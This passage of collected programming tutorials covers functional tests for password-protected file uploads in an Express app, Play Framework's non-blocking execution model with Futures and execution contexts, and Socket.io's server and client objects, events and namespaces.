        .expect(302)
        .expect('Location', /\/files\/(.*)\.html/)
        .end(function(err, res) {
          (err == null).should.be.true;
          var fileUid = res.headers['location'].match(/\/files\/(.*)\.html/)[1];
          done(null, fileUid);
        });
    });
}

Note that we will use rimraf in an after function to clean up the files folder, but it would be best to have a separate path for uploading files while testing (other than the one used for development and production):

describe('Files-Routes', function(done) {
  after(function() {
    var filesDir = __dirname + '/../../files';
    rimraf.sync(filesDir);
    fs.mkdirSync(filesDir);
  });

When testing the file uploads, we want to make sure that without providing the correct password, access will not be granted to the file pages:

  describe("Uploading a file", function() {
    it("should upload a file without password protecting it", function(done) {
      var agent = request.agent(app);
      uploadFile(agent, null, done);
    });

    it("should upload a file and password protect it", function(done) {
      var agent = request.agent(app);
      var pwd = 'sample-password';

      uploadFile(agent, pwd, function(err, filename) {
        async.parallel([
          function getWithoutPwd(next) {
            agent
              .get('/files/' + filename + '.html')
              .expect(401)
              .end(function(err, res) {
                (err == null).should.be.true;
                next();
              });
          },
          function getWithPwd(next) {
            agent
              .get('/files/' + filename + '.html')
              .set('Authorization', 'Basic ' + new Buffer(':' + pwd).toString('base64'))
              .expect(200)
              .end(function(err, res) {
                (err == null).should.be.true;
                next();
              });
          }
        ], function(err) {
          (err == null).should.be.true;
          done();
        });
      });
    });
  });
});

It's time to do the same thing we did for the unit tests: create a script so we can run them with npm using npm run functional-tests. At the same time, we should update the npm test script to include both our unit tests and our functional tests:

"scripts": {
  "start": "node ./bin/www",
  "unit-tests": "mocha --reporter=spec test/unit",
  "functional-tests": "mocha --reporter=spec --timeout=10000 --slow=2000 test/functional",
  "test": "npm run unit-tests && npm run functional-tests"
}

If we run the tests, we should see the following output:

Running tests before committing in Git

It's a good practice to run the test suite before committing to Git and to only allow the commit to pass if the tests have executed successfully. The same applies to other version control systems. To achieve this, we should add the .git/hooks/pre-commit file, which should take care of running the tests and exiting with an error in case they fail. Luckily, this is a repetitive task (which can be applied to all Node applications), so there is an NPM module that creates this hook file for us. All we need to do is install the pre-commit module (https://www.npmjs.org/package/pre-commit) as a development dependency, using the following command:

$ npm i pre-commit --save-dev

This should automatically create the pre-commit hook file so that all the tests are run before committing (using the npm test command). The pre-commit module also supports running custom scripts specified in the package.json file.
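For instance, a hedged sketch of what that configuration could look like (the lint script and its jshint command are made up for illustration; the pre-commit key lists which scripts the hook should run):

"scripts": {
  "lint": "jshint .",
  "test": "npm run unit-tests && npm run functional-tests"
},
"pre-commit": ["lint", "test"]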
For more details on how to achieve that, read the module documentation at https://www.npmjs.org/package/pre-commit.

Summary

In this article, we learned about writing tests for Express applications and, in the process, explored a variety of helpful modules.

Resources for Article:

Further resources on this subject:
Web Services Testing and soapUI [article]
ExtGWT Rich Internet Application: Crafting UI Real Estate [article]
Rendering web pages to PDF using Railo Open Source [article]


Handling Long-running Requests in Play

Packt
22 Sep 2014
18 min read
In this article by Julien Richard-Foy, author of Play Framework Essentials, we will dive into the framework internals and explain how to leverage its reactive programming model to manipulate data streams.

(For more resources related to this topic, see here.)

Firstly, I would like to mention that the code called by controllers must be thread-safe. We also noticed that the result of calling an action has the type Future[Result] rather than just Result. This article explains these subtleties and answers questions such as "How are concurrent requests processed by Play applications?" More precisely, this article presents the challenges of stream processing and the way the Play framework solves them. You will learn how to consume, produce, and transform data streams in a non-blocking way using the Iteratee library. Then, you will leverage these skills to stream results and push real-time notifications to your clients. By the end of the article, you will be able to do the following:

Produce, consume, and transform streams of data
Process a large request body chunk by chunk
Serve HTTP chunked responses
Push real-time notifications using WebSockets or server-sent events
Manage the execution context of your code

Play application's execution model

The streaming programming model provided by Play has been influenced by the execution model of Play applications, which itself has been influenced by the nature of the work a web application performs. So, let's start from the beginning: what does a web application do?

For now, our example application does the following: the HTTP layer invokes some business logic via the service layer, and the service layer does some computations by itself and also calls the database layer. It is worth noting that in our configuration, the database system runs on the same machine as the web application, but this is not a requirement. In fact, there are chances that in real-world projects, your database system is decoupled from your HTTP layer and that both run on different machines. This means that while a query is executed on the database, the web layer does nothing but wait for the response. Actually, the HTTP layer is often waiting for some response coming from another system; it could, for example, retrieve some data from an external web service, or the business layer itself could be located on a remote machine. Decoupling the HTTP layer from the business layer or the persistence layer gives finer control over how to scale the system (more details about that are given further on in this article). Anyway, the point is that the HTTP layer may essentially spend time waiting.

With that in mind, consider the following diagram showing how concurrent requests could be executed by a web application using a threaded execution model, that is, a model where each request is processed in its own thread.

Threaded execution model

Several clients (shown on the left-hand side in the preceding diagram) perform queries that are processed by the application's controller. On the right-hand side of the controller, the figure shows an execution thread corresponding to each action's execution. The filled rectangles represent the time spent performing computations within a thread (for example, for processing data or computing a result), and the lines represent the time waiting for some remote data. Each action's execution is distinguished by a particular color.
In this fictitious example, the action handling the first request may execute a query to a remote database, hence the line (illustrating that the thread waits for the database result) between the two pink rectangles (illustrating that the action performs some computation before querying the database and after getting the database result). The action handling the third request may perform a call to a distant web service and then a second one after the response to the first one has been received; hence, the two lines between the green rectangles. And the action handling the last request may perform a call to a distant web service that streams a response of infinite size; hence, the multiple lines between the purple rectangles.

The problem with this execution model is that each request requires the creation of a new thread. Threads have an overhead at creation, because they consume memory (essentially because each thread has its own stack), and during execution, when the scheduler switches contexts. However, we can see that these threads spend a lot of time just waiting. If we could use the same thread to process another request while the current action is waiting for something, we could avoid the creation of threads and thus save resources. This is exactly what the execution model used by Play—the evented execution model—does, as depicted in the following diagram:

Evented execution model

Here, the computation fragments are executed on two threads only. Note that the same action can have its computation fragments run by different threads (for example, the pink action). Also note that several threads are still in use; that's why the code must be thread-safe. The time spent waiting between computing things is the same as before, and you can see that the time required to completely process a request is about the same as with the threaded model (for instance, the second pink rectangle ends at the same position as in the earlier figure; the same holds for the third green rectangle, and so on).

A comparison between the threaded and evented models can be found in the master's thesis of Benjamin Erb, Concurrent Programming for Scalable Web Architectures, 2012. An online version is available at http://berb.github.io/diploma-thesis/.

An attentive reader may think that I have cheated; the rectangles in the second figure are often thinner than their equivalents in the first figure. That's because, in the first model, there is an overhead for scheduling threads and, above all, even if you have a lot of threads, your machine still has a limited number of cores effectively executing the code of your threads. More precisely, if you have more threads than cores, you necessarily have threads in an idle state (that is, waiting). This means that, if we suppose the machine executing the application has only two cores, in the first figure, there is even time spent waiting within the rectangles!

Scaling up your server

The previous section raises the question of how to handle a higher number of concurrent requests, as depicted in the following diagram:

A server under an increasing load

The previous section explained how to avoid wasting resources in order to leverage the computing power of your server. But actually, there is no magic; if you want to compute even more things per unit of time, you need more computing power, as depicted in the following diagram:

Scaling using more powerful hardware

One solution could be to have a more powerful server.
But you could be smarter than that and avoid buying expensive hardware by studying the shape of the workload and making appropriate decisions at the software level. Indeed, chances are that your workload varies a lot over time, with peaks and troughs of activity. This suggests that if you wanted to buy more powerful hardware, its performance characteristics would be dictated by your highest activity peak, even if it occurs very occasionally. Obviously, this solution is not optimal, because you would buy expensive hardware even though you actually need it only one percent of the time (and more powerful hardware often also means more power-consuming hardware).

A better way to handle workload elasticity consists of adding or removing server instances according to the activity level, as depicted in the following diagram:

Scaling using several server instances

This architecture design allows you to finely (and dynamically) tune your server capacity according to your workload. That's actually the cloud computing model. Nevertheless, this architecture has a major implication for your code; you cannot assume that subsequent requests issued by the same client will be handled by the same server instance. In practice, it means that you must treat each request independently of the others; you cannot, for instance, store a counter on a server instance to count the number of requests issued by a client (your server would miss some requests if some were routed to another server instance). In a nutshell, your server has to be stateless. Fortunately, Play is stateless, so as long as you don't explicitly introduce mutable state in your code, your application is stateless. Note that the first implementation I gave of the shop was not stateless; indeed, the state of the application was stored in the server's memory.
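To make the pitfall concrete, here is a minimal Scala sketch (not taken from the book's code base) of the kind of stateful controller you must avoid; each server instance would keep its own counter, so clients behind a load balancer would observe inconsistent values (and the mutation is not even thread-safe):

import play.api.mvc._

object Counters extends Controller {
  // Anti-pattern: this state lives in the memory of a single server
  // instance; it is neither shared across instances nor thread-safe
  var requestCount: Int = 0

  val count = Action {
    requestCount += 1
    Ok("You are visitor number " + requestCount)
  }
}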
Embracing non-blocking APIs

In the first section of this article, I claimed the superiority of the evented execution model over the threaded execution model in the context of web servers. That being said, to be fair, the threaded model has an advantage over the evented model: it is simpler to program with. Indeed, in that case, the framework is responsible for creating the threads and the JVM is responsible for scheduling them, so you don't even have to think about this at all, yet your code is concurrently executed.

On the other hand, with the evented model, concurrency control is explicit and you should care about it. Indeed, the fact that the same execution thread is used to run several concurrent actions has an important implication for your code: it should not block the thread. While the code of an action is executed, no other action code can be concurrently executed on the same thread.

What does blocking mean? It means holding a thread for too long a duration. It typically happens when you perform a heavy computation or wait for a remote response. However, we saw that these cases, especially waiting for remote responses, are very common in web servers, so how should you handle them? You have to wait in a non-blocking way or implement your heavy computations as incremental computations. In all cases, you have to break down your code into computation fragments whose execution is managed by the execution context. In the diagram illustrating the evented execution model, computation fragments are materialized by the rectangles. You can see that rectangles of different colors are interleaved; you can find rectangles of another color between two rectangles of the same color.

However, by default, the code you write forms a single block of execution instead of several computation fragments. It means that, by default, your code is executed sequentially; the rectangles are not interleaved! This is depicted in the following diagram:

Evented execution model running blocking code

The previous figure still shows both execution threads. The second one handles the blue action and then the purple infinite action, so that all the other actions can only be handled by the first one. This figure illustrates the fact that while the evented model can potentially be more efficient than the threaded model, it can also have negative consequences on the performance of your application: infinite actions block an execution thread forever, and the sequential execution of actions can lead to much longer response times.

So, how can you break down your code into blocks that can be managed by an execution context? In Scala, you can do so by wrapping your code in a Future block:

Future {
  // This is a computation fragment
}

The Future API comes from the standard Scala library. For Java users, Play provides a convenient wrapper named play.libs.F.Promise:

Promise.promise(() -> {
    // This is a computation fragment
});

Such a block is a value of type Future[A] or, in Java, Promise<A> (where A is the type of the value computed by the block). We say that these blocks are asynchronous because they break the execution flow; you have no guarantee that the block will be sequentially executed before the following statement. When the block is effectively evaluated depends on the execution context implementation that manages it. The role of an execution context is to schedule the execution of computation fragments. In the figure showing the evented model, the execution context consists of a thread pool containing two threads (represented by the two lines under the rectangles).

Actually, each time you create an asynchronous value, you have to supply the execution context that will manage its evaluation. In Scala, this is usually achieved using an implicit parameter of type ExecutionContext. You can, for instance, use an execution context provided by Play that consists, by default, of a thread pool with one thread per processor:

import play.api.libs.concurrent.Execution.Implicits.defaultContext

In Java, this execution context is automatically used by default, but you can explicitly supply another one:

Promise.promise(() -> { ... }, myExecutionContext);

Now that you know how to create asynchronous values, you need to know how to manipulate them. For instance, a sequence of several Future blocks is concurrently executed; how do we define an asynchronous computation that depends on another one?
You can eventually schedule a computation after an asynchronous value has been resolved using the foreach method:

```scala
val futureX = Future { 42 }
futureX.foreach(x => println(x))
```

In Java, you can perform the same operation using the onRedeem method:

```java
Promise<Integer> futureX = Promise.promise(() -> 42);
futureX.onRedeem((x) -> System.out.println(x));
```

More interestingly, you can eventually transform an asynchronous value using the map method:

```scala
val futureIsEven = futureX.map(x => x % 2 == 0)
```

The map method exists in Java too:

```java
Promise<Boolean> futureIsEven = futureX.map((x) -> x % 2 == 0);
```

If the function you use to transform an asynchronous value returned an asynchronous value too, you would end up with an inconvenient Future[Future[A]] value (or a Promise<Promise<A>> value, in Java). So, use the flatMap method in that case:

```scala
val futureIsEven = futureX.flatMap(x => Future { x % 2 == 0 })
```

The flatMap method is also available in Java (note that the lambda must return the inner promise):

```java
Promise<Boolean> futureIsEven =
    futureX.flatMap((x) -> Promise.promise(() -> x % 2 == 0));
```

The foreach, map, and flatMap functions (or their Java equivalents) all have in common that they set a dependency between two asynchronous values; the computation they take as a parameter is always evaluated after the asynchronous computation they are applied to.

Another method that is worth mentioning is zip:

```scala
val futureXY: Future[(Int, Int)] = futureX.zip(futureY)
```

The zip method is also available in Java:

```java
Promise<Tuple<Integer, Integer>> futureXY = futureX.zip(futureY);
```

The zip method returns an asynchronous value eventually resolved to a tuple containing the two resolved asynchronous values. It can be thought of as a way to join two asynchronous values without specifying any execution order between them. If you want to join more than two asynchronous values, you can use the zip method several times (for example, futureX.zip(futureY).zip(futureZ).zip(…)), but an alternative is to use the Future.sequence function:

```scala
val futureXs: Future[Seq[Int]] =
  Future.sequence(Seq(futureX, futureY, futureZ, …))
```

This function transforms a sequence of future values into a future sequence value. In Java, this function is named Promise.sequence.

In the preceding descriptions, I always used the word eventually, and for a reason. If we use an asynchronous value to manipulate a result sent by a remote machine (such as a database system or a web service), the communication may eventually fail due to some technical issue (for example, if the network is down). For this reason, asynchronous values have error recovery methods; for example, the recover method:

```scala
import scala.util.control.NonFatal

futureX.recover { case NonFatal(e) => y }
```

The recover method is also available in Java:

```java
futureX.recover((throwable) -> y);
```

The previous code resolves futureX to the value of y in the case of an error.

Libraries performing remote calls (such as an HTTP client or a database client) return such asynchronous values when they are implemented in a non-blocking way. You should always check whether the libraries you use are blocking or not, and keep in mind that, by default, Play is tuned to be efficient with non-blocking APIs. It is worth noting that JDBC is blocking, which means that the majority of Java-based libraries for database communication are blocking. Obviously, once you get a value of type Future[A] (or Promise<A>, in Java), there is no way to get the A value unless you wait (and block) for the value to be resolved.
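Before moving on, here is a hedged sketch that puts these combinators together while staying inside Future (fetchUser and fetchOrders are hypothetical non-blocking calls returning Future values, and an implicit ExecutionContext is assumed to be in scope); a Scala for-comprehension desugars to exactly the flatMap and map calls described above:

```scala
import scala.concurrent.Future
import scala.util.control.NonFatal

// Hypothetical non-blocking services, shown for illustration only
def userSummary(id: Long): Future[String] =
  (for {
    user   <- fetchUser(id)      // Future[User]
    orders <- fetchOrders(user)  // Future[Seq[Order]], evaluated after fetchUser
  } yield s"${user.name} has ${orders.size} orders")
    .recover { case NonFatal(e) => "temporarily unavailable" }
```

Note that the for-comprehension imposes an order (fetchOrders runs after fetchUser); if the two computations were independent, zip would let them run without any ordering constraint. Also note that the result is still a Future[String]: the value never leaves the asynchronous world.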
We saw that the map and flatMap methods make it possible to manipulate the future A value, but you still end up with a Future[SomethingElse] value (or a Promise<SomethingElse>, in Java). It means that if your action's code calls an asynchronous API, it will end up with a Future[Result] value rather than a Result value. In that case, you have to use Action.async instead of Action, as illustrated in this typical code example:

```scala
val asynchronousAction = Action.async { implicit request =>
  service.asynchronousComputation().map(result => Ok(result))
}
```

In Java, there is nothing special to do; simply make your method return a Promise<Result> object:

```java
public static Promise<Result> asynchronousAction() {
  return service.asynchronousComputation().map((result) -> ok(result));
}
```

Managing execution contexts

Because Play uses explicit concurrency control, controllers are also responsible for using the right execution context to run their action's code. Generally, as long as your actions do not invoke heavy computations or blocking APIs, the default execution context should work fine. However, if your code is blocking, it is recommended to use a distinct execution context to run it.

An application with two execution contexts (represented by the black and grey arrows). You can specify in which execution context each action should be executed, as explained in this section.

Unfortunately, there is no non-blocking standard API for relational database communication (JDBC is blocking). It means that all our actions that invoke code executing database queries should be run in a distinct execution context so that the default execution context is not blocked. This distinct execution context has to be configured according to your needs. In the case of JDBC communication, your execution context should be a thread pool with as many threads as your maximum number of connections. The following diagram illustrates such a configuration:

The preceding diagram shows two execution contexts, each with two threads. The execution context at the top of the figure runs database code, while the default execution context (at the bottom) handles the remaining (non-blocking) actions.

In practice, it is convenient to use Akka to define your execution contexts, as they are easily configurable. Akka is a library used for building concurrent, distributed, and resilient event-driven applications. This article assumes that you have some knowledge of Akka; if that is not the case, do some research on it. Play integrates Akka and manages an actor system that follows your application's life cycle (that is, it is started and shut down with the application). For more information on Akka, visit http://akka.io.

Here is how you can create an execution context with a thread pool of 10 threads, in your application.conf file:

```
jdbc-execution-context {
  thread-pool-executor {
    core-pool-size-factor = 10.0
    core-pool-size-max = 10
  }
}
```

You can use it as follows in your code:

```scala
import play.api.libs.concurrent.Akka
import play.api.Play.current

implicit val jdbc =
  Akka.system.dispatchers.lookup("jdbc-execution-context")
```

The Akka.system expression retrieves the actor system managed by Play. Then, the execution context is retrieved using Akka's API.
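Putting the configuration and the lookup together, here is a hedged sketch of an action that runs a blocking query on the dedicated pool (it assumes the imports and the implicit jdbc value from the preceding snippet; database.getUser is a hypothetical blocking JDBC helper, not from the original text):

```scala
// The implicit jdbc context declared above is picked up by Future and map,
// so the blocking call never occupies the default execution context.
def user(id: Long) = Action.async {
  Future {
    database.getUser(id)  // hypothetical blocking JDBC call
  }.map(u => Ok(u.toString))
}
```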
In Java, the equivalent execution-context lookup is the following:

```java
import play.libs.Akka;
import akka.dispatch.MessageDispatcher;
import play.core.j.HttpExecutionContext;

MessageDispatcher jdbc =
    Akka.system().dispatchers().lookup("jdbc-execution-context");
```

Note that controllers retrieve the current request's information from a thread-local static variable, so you have to attach it to the execution context's thread before using it from a controller's action:

```java
play.core.j.HttpExecutionContext.fromThread(jdbc)
```

Finally, forcing the use of a specific execution context for a given action can be achieved as follows (provided that my.execution.context is an implicit execution context):

```scala
import my.execution.context

val myAction = Action.async {
  Future { … }
}
```

The equivalent Java code is as follows:

```java
public static Promise<Result> myAction() {
  return Promise.promise(
      () -> { … },
      HttpExecutionContext.fromThread(myExecutionContext));
}
```

Does this feel like clumsy code? Buy the book to learn how to reduce the boilerplate!

Summary

This article detailed a lot of things about the internals of the framework. You now know that Play uses an evented execution model to process requests and serve responses, and that this implies that your code should not block the execution thread. You know how to use future blocks and promises to define computation fragments that can be concurrently managed by Play's execution context, and how to define your own execution context with a different threading policy, for example, if you are constrained to use a blocking API.

Resources for Article:

Further resources on this subject:
- Play! Framework 2 – Dealing with Content [article]
- So, what is Play? [article]
- Play Framework: Introduction to Writing Modules [article]
Adding Real-time Functionality Using Socket.io

In this article, Amos Q. Haviv, the author of MEAN Web Development, describes how Socket.io enables Node.js developers to support real-time communication using WebSockets in modern browsers and legacy fallback protocols in older browsers.

Introducing WebSockets

Modern web applications such as Facebook, Twitter, or Gmail incorporate real-time capabilities, which enable the application to continuously present the user with recently updated information. Unlike traditional applications, in real-time applications the common roles of browser and server can be reversed, since the server needs to update the browser with new data regardless of the browser's request state. This means that unlike the common HTTP behavior, the server won't wait for the browser's requests. Instead, it will send new data to the browser whenever this data becomes available.

This reverse approach is often called Comet, a term coined by a web developer named Alex Russell back in 2006 (the term was a word play on the AJAX term; both Comet and Ajax are common household cleaners in the US). In the past, there were several ways to implement Comet functionality using the HTTP protocol.

The first and easiest way is XHR polling. In XHR polling, the browser makes periodic requests to the server. The server then returns an empty response unless it has new data to send back. Upon a new event, the server will return the new event data to the next polling request. While this works quite well for most browsers, this method has two problems. The most obvious one is that it generates a large number of requests that hit the server for no particular reason, since many requests return empty. The second problem is that the update time depends on the request period. This means that new data will only get pushed to the browser on the next request, causing delays in updating the client state.

To solve these issues, a better approach was introduced: XHR long polling. In XHR long polling, the browser makes an XHR request to the server, but a response is not sent back unless the server has new data. Upon an event, the server responds with the event data and the browser makes a new long polling request. This cycle enables better management of requests, since there is only a single request per session. Furthermore, the server can update the browser immediately with new information, without having to wait for the browser's next request. Because of its stability and usability, XHR long polling became the standard approach for real-time applications and was implemented in various ways, including Forever iFrame, multipart XHR, JSONP long polling using script tags (for cross-domain, real-time support), and the common long-living XHR.
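To make the technique concrete, here is a simplified browser-side sketch of XHR long polling (the /poll endpoint and the retry delay are assumptions for illustration; a real implementation would also handle timeouts and message framing):

```javascript
function longPoll() {
  var xhr = new XMLHttpRequest();
  xhr.open('GET', '/poll'); // hypothetical endpoint that holds the request open
  xhr.onload = function() {
    console.log('new event:', xhr.responseText);
    longPoll(); // immediately open the next long-lived request
  };
  xhr.onerror = function() {
    setTimeout(longPoll, 5000); // back off and retry on failure
  };
  xhr.send();
}
longPoll();
```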
However, all these approaches were actually hacks, using the HTTP and XHR protocols in ways they were not meant to be used. With the rapid development of modern browsers and the increased adoption of the new HTML5 specifications, a new protocol emerged for implementing real-time communication: full-duplex WebSockets.

In browsers that support the WebSockets protocol, the initial connection between the server and browser is made over HTTP and is called an HTTP handshake. Once the initial connection is made, the browser and server open a single ongoing communication channel over a TCP socket. Once the socket connection is established, it enables bidirectional communication between the browser and server. This enables both parties to send and retrieve messages over a single communication channel. This also helps to lower server load, decrease message latency, and unify PUSH communication using a standalone connection.

However, WebSockets still suffer from two major problems. First and foremost is browser compatibility. The WebSockets specification is fairly new, so older browsers don't support it, and though most modern browsers now implement the protocol, a large group of users are still using these older browsers. The second problem is HTTP proxies, firewalls, and hosting providers. Since WebSockets use a different communication protocol than HTTP, a lot of these intermediaries don't support it yet and block any socket communication. As it has always been with the Web, developers are left with a fragmentation problem, which can only be solved using an abstraction library that optimizes usability by switching between protocols according to the available resources. Fortunately, a popular library called Socket.io was already developed for this purpose, and it is freely available to the Node.js developer community.

Introducing Socket.io

Created in 2010 by JavaScript developer Guillermo Rauch, Socket.io aimed to abstract Node.js real-time application development. Since then, it has evolved dramatically, released in nine major versions before being broken in its latest version into two different modules: Engine.io and Socket.io.

Previous versions of Socket.io were criticized for being unstable, since they first tried to establish the most advanced connection mechanisms and then fall back to more primitive protocols. This caused serious issues with using Socket.io in production environments and posed a threat to the adoption of Socket.io as a real-time library. To solve this, the Socket.io team redesigned it and wrapped the core functionality in a base module called Engine.io.

The idea behind Engine.io was to create a more stable real-time module, which first opens a long-polling XHR communication and then tries to upgrade the connection to a WebSockets channel. The new version of Socket.io uses the Engine.io module and provides the developer with various features such as events, rooms, and automatic connection recovery, which you would otherwise have to implement yourself. In this article's examples, we will use the new Socket.io 1.0, which is the first version to use the Engine.io module. Older versions of Socket.io prior to Version 1.0 do not use the new Engine.io module and are therefore much less stable in production environments.

When you include the Socket.io module, it provides you with two objects: a socket server object that is responsible for the server functionality and a socket client object that handles the browser's functionality. We'll begin by examining the server object.

The Socket.io server object

The Socket.io server object is where it all begins. You start by requiring the Socket.io module, and then use it to create a new Socket.io server instance that will interact with socket clients. The server object supports both a standalone implementation and the ability to use it in conjunction with the Express framework. The server instance then exposes a set of methods that allow you to manage the Socket.io server operations. Once the server object is initialized, it will also be responsible for serving the socket client JavaScript file for the browser.
A simple implementation of the standalone Socket.io server will look as follows:

```javascript
var io = require('socket.io')();
io.on('connection', function(socket){ /* ... */ });
io.listen(3000);
```

This will open a Socket.io server over port 3000 and serve the socket client file at the URL http://localhost:3000/socket.io/socket.io.js. Implementing the Socket.io server in conjunction with an Express application will be a bit different:

```javascript
var app = require('express')();
var server = require('http').Server(app);
var io = require('socket.io')(server);
io.on('connection', function(socket){ /* ... */ });
server.listen(3000);
```

This time, you first use the http module of Node.js to create a server and wrap the Express application. The server object is then passed to the Socket.io module and serves both the Express application and the Socket.io server. Once the server is running, it will be available for socket clients to connect. A client trying to establish a connection with the Socket.io server will start by initiating the handshaking process.

Socket.io handshaking

When a client wants to connect to the Socket.io server, it will first send a handshake HTTP request. The server will then analyze the request to gather the necessary information for ongoing communication. It will then look for configuration middleware that is registered with the server and execute it before firing the connection event. When the client is successfully connected to the server, the connection event listener is executed, exposing a new socket instance. Once the handshaking process is over, the client is connected to the server and all communication with it is handled through the socket instance object. For example, handling a client's disconnection event will be as follows:

```javascript
var app = require('express')();
var server = require('http').Server(app);
var io = require('socket.io')(server);
io.on('connection', function(socket){
  socket.on('disconnect', function() {
    console.log('user has disconnected');
  });
});
server.listen(3000);
```

Notice how the socket.on() method adds an event handler to the disconnection event. Although the disconnection event is a predefined event, this approach works the same for custom events as well, as you will see in the following sections.

While the handshake mechanism is fully automatic, Socket.io does provide you with a way to intercept the handshake process using configuration middleware.

The Socket.io configuration middleware

Although the Socket.io configuration middleware existed in previous versions, in the new version it is even simpler and allows you to manipulate socket communication before the handshake actually occurs. To create a configuration middleware, you will need to use the server's use() method, which is very similar to the Express application's use() method:

```javascript
var app = require('express')();
var server = require('http').Server(app);
var io = require('socket.io')(server);
io.use(function(socket, next) {
  /* ... */
  next(null, true);
});
io.on('connection', function(socket){
  socket.on('disconnect', function() {
    console.log('user has disconnected');
  });
});
server.listen(3000);
```

As you can see, the io.use() method callback accepts two arguments: the socket object and a next callback. The socket object is the same socket object that will be used for the connection, and it holds some connection properties. One important property is the socket.request property, which represents the handshake HTTP request. In the following sections, you will use the handshake request to incorporate the Passport session with the Socket.io connection.
The next argument is a callback method that accepts two arguments: an error object and a Boolean value. The next callback tells Socket.io whether or not to proceed with the handshake process, so if you pass an error object or a false value to the next method, Socket.io will not initiate the socket connection.
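For example, here is a hedged sketch of configuration middleware that aborts the handshake when a client fails a simple token check (the token query parameter and the expected value are assumptions for illustration, not part of the original example):

```javascript
io.use(function(socket, next) {
  var token = socket.handshake.query.token;
  if (token === 'expected-secret') {
    next(null, true);  // proceed with the handshake
  } else {
    next(new Error('not authorized'), false);  // abort the connection
  }
});
```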
Now that you have a basic understanding of how handshaking works, it is time to discuss the Socket.io client object.

The Socket.io client object

The Socket.io client object is responsible for the implementation of the browser's socket communication with the Socket.io server. You start by including the Socket.io client JavaScript file, which is served by the Socket.io server. The Socket.io JavaScript file exposes an io() method that connects to the Socket.io server and creates the client socket object. A simple implementation of the socket client will be as follows:

```html
<script src="/socket.io/socket.io.js"></script>
<script>
  var socket = io();
  socket.on('connect', function() {
    /* ... */
  });
</script>
```

Notice the default URL for the Socket.io client object. Although this can be altered, you can usually leave it like this and just include the file from the default Socket.io path. Another thing you should notice is that the io() method will automatically try to connect to the default base path when executed with no arguments; however, you can also pass a different server URL as an argument.

As you can see, the socket client is much easier to implement, so we can move on to discuss how Socket.io handles real-time communication using events.

Socket.io events

To handle the communication between the client and the server, Socket.io uses a structure that mimics the WebSockets protocol and fires event messages across the server and client objects. There are two types of events: system events, which indicate the socket connection status, and custom events, which you'll use to implement your business logic.

The system events on the socket server are as follows:
- io.on('connection', ...): This is emitted when a new socket is connected
- socket.on('message', ...): This is emitted when a message is sent using the socket.send() method
- socket.on('disconnect', ...): This is emitted when the socket is disconnected

The system events on the client are as follows:
- socket.io.on('open', ...): This is emitted when the socket client opens a connection with the server
- socket.io.on('connect', ...): This is emitted when the socket client is connected to the server
- socket.io.on('connect_timeout', ...): This is emitted when the socket client connection with the server times out
- socket.io.on('connect_error', ...): This is emitted when the socket client fails to connect with the server
- socket.io.on('reconnect_attempt', ...): This is emitted when the socket client tries to reconnect with the server
- socket.io.on('reconnect', ...): This is emitted when the socket client is reconnected to the server
- socket.io.on('reconnect_error', ...): This is emitted when a reconnection attempt fails
- socket.io.on('reconnect_failed', ...): This is emitted when the socket client gives up after all reconnection attempts have failed
- socket.io.on('close', ...): This is emitted when the socket client closes the connection with the server

Handling events

While system events help us with connection management, the real magic of Socket.io relies on using custom events. In order to do so, Socket.io exposes two methods, both on the client and server objects. The first method is the on() method, which binds event handlers to events, and the second method is the emit() method, which is used to fire events between the server and client objects.

An implementation of the on() method on the socket server is very simple:

```javascript
var app = require('express')();
var server = require('http').Server(app);
var io = require('socket.io')(server);
io.on('connection', function(socket){
  socket.on('customEvent', function(customEventData) {
    /* ... */
  });
});
server.listen(3000);
```

In the preceding code, you bound an event listener to the customEvent event. The event handler is called when the socket client object emits the customEvent event. Notice how the event handler accepts the customEventData argument that is passed to the event handler from the socket client object.

An implementation of the on() method on the socket client is also straightforward:

```html
<script src="/socket.io/socket.io.js"></script>
<script>
  var socket = io();
  socket.on('customEvent', function(customEventData) {
    /* ... */
  });
</script>
```

This time the event handler is called when the socket server emits the customEvent event that sends customEventData to the socket client event handler. Once you set your event handlers, you can use the emit() method to send events from the socket server to the socket client and vice versa.

Emitting events

On the socket server, the emit() method is used to send events to a single socket client or a group of connected socket clients. The emit() method can be called from the connected socket object, which will send the event to a single socket client, as follows:

```javascript
io.on('connection', function(socket){
  socket.emit('customEvent', customEventData);
});
```

The emit() method can also be called from the io object, which will send the event to all connected socket clients, as follows:

```javascript
io.on('connection', function(socket){
  io.emit('customEvent', customEventData);
});
```

Another option is to send the event to all connected socket clients except the sender using the broadcast property, as shown in the following lines of code:

```javascript
io.on('connection', function(socket){
  socket.broadcast.emit('customEvent', customEventData);
});
```

On the socket client, things are much simpler. Since the socket client is only connected to the socket server, the emit() method will only send the event to the socket server:

```javascript
var socket = io();
socket.emit('customEvent', customEventData);
```
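Tying on() and emit() together, here is a small end-to-end sketch (the chatMessage event name is an assumption for illustration): the server relays each message it receives to every other connected client.

```javascript
// Server side: rebroadcast each incoming message to everyone but the sender
io.on('connection', function(socket) {
  socket.on('chatMessage', function(message) {
    socket.broadcast.emit('chatMessage', message);
  });
});

// Client side: send a message and log messages from other clients
// var socket = io();
// socket.emit('chatMessage', 'hello');
// socket.on('chatMessage', function(message) { console.log(message); });
```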
Although these methods allow you to switch between personal and global events, they still lack the ability to send events to a group of connected socket clients. Socket.io offers two options to group sockets together: namespaces and rooms.

Socket.io namespaces

In order to easily control socket management, Socket.io allows developers to split socket connections according to their purpose using namespaces. So instead of creating different socket servers for different connections, you can just use the same server to create different connection endpoints. This means that socket communication can be divided into groups, which will then be handled separately.

Socket.io server namespaces

To create a socket server namespace, you will need to use the socket server's of() method, which returns a socket namespace. Once you retain the socket namespace, you can just use it the same way you use the socket server object:

```javascript
var app = require('express')();
var server = require('http').Server(app);
var io = require('socket.io')(server);
io.of('/someNamespace').on('connection', function(socket){
  socket.on('customEvent', function(customEventData) {
    /* ... */
  });
});
io.of('/someOtherNamespace').on('connection', function(socket){
  socket.on('customEvent', function(customEventData) {
    /* ... */
  });
});
server.listen(3000);
```

In fact, when you use the io object, Socket.io actually uses a default empty namespace as follows:

```javascript
io.on('connection', function(socket){
  /* ... */
});
```

The preceding lines of code are actually equivalent to this:

```javascript
io.of('').on('connection', function(socket){
  /* ... */
});
```

Socket.io client namespaces

On the socket client, the implementation is a little different:

```html
<script src="/socket.io/socket.io.js"></script>
<script>
  var someSocket = io('/someNamespace');
  someSocket.on('customEvent', function(customEventData) {
    /* ... */
  });
  var someOtherSocket = io('/someOtherNamespace');
  someOtherSocket.on('customEvent', function(customEventData) {
    /* ... */
  });
</script>
```

